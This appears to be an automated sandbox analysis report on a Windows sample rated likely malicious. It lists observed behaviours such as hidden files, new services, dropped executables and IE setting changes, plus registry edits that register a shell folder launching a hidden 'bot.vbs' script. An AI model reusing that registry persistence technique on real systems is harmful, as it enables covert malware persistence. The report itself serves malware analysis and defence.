Analysis Overview
SHA256
e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975
Threat Level: Likely malicious
The file e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N was found to be: Likely malicious.
Malicious Activity Summary
Sets file to hidden
Creates new service(s)
Loads dropped DLL
Executes dropped EXE
Checks computer location settings
Indicator Removal: File Deletion
Drops file in Program Files directory
Launches sc.exe
Enumerates physical storage devices
System Service Discovery
System Location Discovery: System Language Discovery
Unsigned PE
Modifies Internet Explorer settings
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Suspicious use of FindShellTrayWindow
Runs net.exe
Suspicious use of WriteProcessMemory
Modifies registry class
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-07 21:30
Signatures
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-07 21:30
Reported
2024-11-07 21:32
Platform
win7-20241010-en
Max time kernel
117s
Max time network
122s
Command Line
Signatures
Creates new service(s)
Sets file to hidden
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\attrib.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Kingsoft\myfile\soft\msn.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Program Files\Kingsoft\myfile\soft\msn.exe | N/A |
| N/A | N/A | C:\Program Files\Kingsoft\myfile\soft\msn.exe | N/A |
| N/A | N/A | C:\Program Files\Kingsoft\myfile\soft\msn.exe | N/A |
Indicator Removal: File Deletion
Drops file in Program Files directory
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\e4d752d482500d601679f6c0ac976cc6318d738a949f440745310dd823e0a975N.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files\Kingsoft\myfile\soft\msn.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\at.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\sc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\net1.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\attrib.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\reg.exe | N/A |
System Service Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\net.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\net1.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IntelliForms | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "437176925" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Zoom | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{934E8AB1-9D4F-11EF-95B1-7E31667997D6} = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\InternetRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = c0a1416a5c31db01 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\GPU | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\IETld\LowMic | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\PageSetup | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e78a69453f00554b9c7935775bae7b9600000000020000000000106600000001000020000000a2c8b71d5b553fd6eb4fe6e2e9270457a818e842237d43c96bc8091b5ec4db18000000000e8000000002000020000000813052dd02335fd52af92790285d8f87c527fb67d9a20beee85eba0b7a836bd720000000002ba5c74e5ad46d1e3c9da48abf384b8807d02d55a5fc5d30f7099b93a01ce440000000c4c6b90154c94e8df2cb0230ac19f44a9099983205fbfc08f1ae9685e31c07a378473be33dd83070250579505efbc328960da11880d1ed81aa663270afd8a768 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e78a69453f00554b9c7935775bae7b9600000000020000000000106600000001000020000000d00ee646920f2e8fb9e5de80e6dfab02fdaa331514de22628ce91d587b94b150000000000e80000000020000200000002b0122b0642457b516c5f754b76515b7f853d278f3bead52628780aa495f1ea390000000598c56c2d2e2af646ae697bfda6b497bd79b12e4b204aacf16a5e480f1bf680e7d48ffa10e6314f07570674ef787910fa21be7a4e93ac512a18771ccb981566840df63063e42d1eb30842195bd6c7d21803a58801bea7b0e67e26c8ca62757832b752ffa3d855e455b79da745e38c366addaec0e516c02cd789ed48d5cad1111f4a0deb844be11e8b622d8fd7b3140b5400000003894bbff0a8980d7ef1dac9e061298d25577eb17eea84b034476279c79e4ac87742ed470c1e13cdfa80ad01624ced9c6ac8c757c4bffeb3fb8aa2a60f87ca71b | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000 | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "3" | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\SearchScopes | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB} | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InfoTip = "@shdoclc.dll,-880" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ThreadingModel = "Apartment" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\ = "┤≥┐¬╓≈╥│(&H)" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB} | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\WantsParsDisplayName | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\MUIVerb = "@shdoclc.dll,-10241" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\HideFolderVerbs | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H) | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\Attributes = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB} | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R) | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\LocalizedString = "@shdoclc.dll,-880" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32\ = "%systemRoot%\\SysWow64\\shdocvw.dll" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command\ = "wscript.exe c:\\progra~1\\Kingsoft\\myfile\\Microsoft\\bot.vbs" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon\ = "shdoclc.dll,0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\HideOnDesktopPerUser | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\DefaultIcon\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\InProcServer32 | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command\ | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\┤≥┐¬╓≈╥│(&H)\Command | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\shell\╩⌠╨╘(&R)\Command\ = "rundll32.exe shell32.dll,Control_RunDLL INETCPL.CPL,,0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{00000108-0000-0010-8000-00AA006DBBBB}\ShellFolder\ | C:\Windows\SysWOW64\reg.exe | N/A |
Runs net.exe
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files\Internet Explorer\iexplore.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\RarSFX0\ar2.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
